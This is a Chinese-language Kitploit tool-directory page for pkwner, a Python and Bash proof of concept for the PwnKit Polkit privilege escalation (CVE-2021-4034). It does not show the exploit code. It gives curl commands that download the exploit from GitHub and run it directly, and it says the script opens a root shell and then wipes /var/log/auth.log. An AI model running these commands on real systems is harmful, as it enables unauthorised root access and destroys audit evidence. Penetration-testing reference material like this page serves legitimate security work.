Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
pkwner — CVE-2021-4034 的 python3 和 bash PoC,作者为 Kim Schulz | Kitploit
工具/GitHubGitHub/kimusan/pkwner
权限提升漏洞分析漏洞利用后渗透利用渗透测试红队
GitHubkimusan/pkwner

pkwner

CVE-2021-4034 的 python3 和 bash PoC,作者为 Kim Schulz

查看仓库
2374年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
root@kitploit:~
██████╗ ██╗  ██╗██╗    ██╗███╗   ██╗███████╗██████╗ 
██╔══██╗██║ ██╔╝██║    ██║████╗  ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗  ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝  ██╔══██╗
██║     ██║  ██╗╚███╔███╔╝██║ ╚████║███████╗██║  ██║
╚═╝     ╚═╝  ╚═╝ ╚══╝╚══╝ ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝
由 Kim Schulz 为 CVE-2021-4034 编写的 Python3 和 BASH PoC

简介

这是针对新发现的 Polkit 错误 PwnKit 的一个简单 PoC。

我同时制作了 bash 和 python3 两个版本——纯粹是为了好玩。

这个问题非常容易被利用,但后果极其严重,因为在大多数 Linux 机器上,只要攻击者拥有本地用户访问权限,就能轻松获得 root 权限。

如何运行

这些脚本是一次性执行,只需运行

root@kitploit:~
python3 pkwner.py

或

root@kitploit:~
bash pkwner.sh

你也可以通过 Web 服务器(例如本 GitHub 仓库)直接运行:

root@kitploit:~
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)

或

root@kitploit:~
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))

两种方式运行后,效果大致如下: alt text 以及 alt text

脚本会创建一些文件和文件夹,但在弹出 root shell 后会自行清理——它甚至会清理 /var/log/auth.log(为什么不呢)。

致谢

  • Qualys 发现该问题并公开相关信息
  • Andris Raugulis 制作了最早的 PoC 之一,为本项目提供了灵感
  • MiscGang 因为 misgang@Kalmarunionen 非常厉害
下载工具